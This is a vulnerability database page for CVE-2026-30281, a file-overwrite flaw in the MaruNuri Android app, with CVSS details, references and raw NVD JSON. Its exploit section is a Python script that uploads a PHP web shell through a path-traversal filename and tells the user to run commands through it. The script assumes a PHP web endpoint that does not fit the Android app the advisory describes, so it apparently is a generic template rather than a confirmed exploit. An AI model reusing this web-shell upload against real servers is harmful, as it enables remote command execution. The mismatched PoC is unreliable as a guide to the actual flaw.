CVE-2026-30281

Description

An arbitrary file overwrite vulnerability in MaruNuri LLC v2.0.23 allows attackers to overwrite critical internal files via the file import process, leading to arbitrary code execution or information exposure.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:maru:neo.maru:2.0.23:*:*:*:*:android:*:* - VULNERABLE

MaruNuri LLC v2.0.23

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def exploit(target_url):
    # Target endpoint for file import
    url = f"{target_url}/api/import"
    
    # Malicious payload to achieve RCE
    payload = "<?php system($_GET['cmd']); ?>"
    
    # Filename with path traversal to overwrite a critical file or upload webshell
    filename = "../../uploads/shell.php"
    
    files = {
        'file': (filename, payload)
    }
    
    try:
        response = requests.post(url, files=files)
        if response.status_code == 200:
            print("[+] Exploit successful! Check your shell at: /uploads/shell.php?cmd=whoami")
        else:
            print(f"[-] Exploit failed. Status code: {response.status_code}")
    except Exception as e:
        print(f"[!] Error: {e}")

# Usage
# exploit("http://target-ip")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-30281
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-30281
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-30281/
[4] VulDB https://vuldb.com/cve/CVE-2026-30281
[5] https://github.com/Secsys-FDU/AF_CVEs/issues/21
[6] https://maru.xyz/
[7] https://play.google.com/store/apps/details?id=neo.maru
[8] https://secsys.fudan.edu.cn/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-30281", "sourceIdentifier": "[email protected]", "published": "2026-03-31T16:16:29.820", "lastModified": "2026-04-06T15:13:05.620", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An arbitrary file overwrite vulnerability in MaruNuri LLC v2.0.23 allows attackers to overwrite critical internal files via the file import process, leading to arbitrary code execution or information exposure."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-73"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:maru:neo.maru:2.0.23:*:*:*:*:android:*:*", "matchCriteriaId": "73B5E77B-995B-4EAB-A66B-759A22D0804B"}]}]}], "references": [{"url": "https://github.com/Secsys-FDU/AF_CVEs/issues/21", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://maru.xyz/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://play.google.com/store/apps/details?id=neo.maru", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://secsys.fudan.edu.cn/", "source": "[email protected]", "tags": ["Not Applicable"]}]}}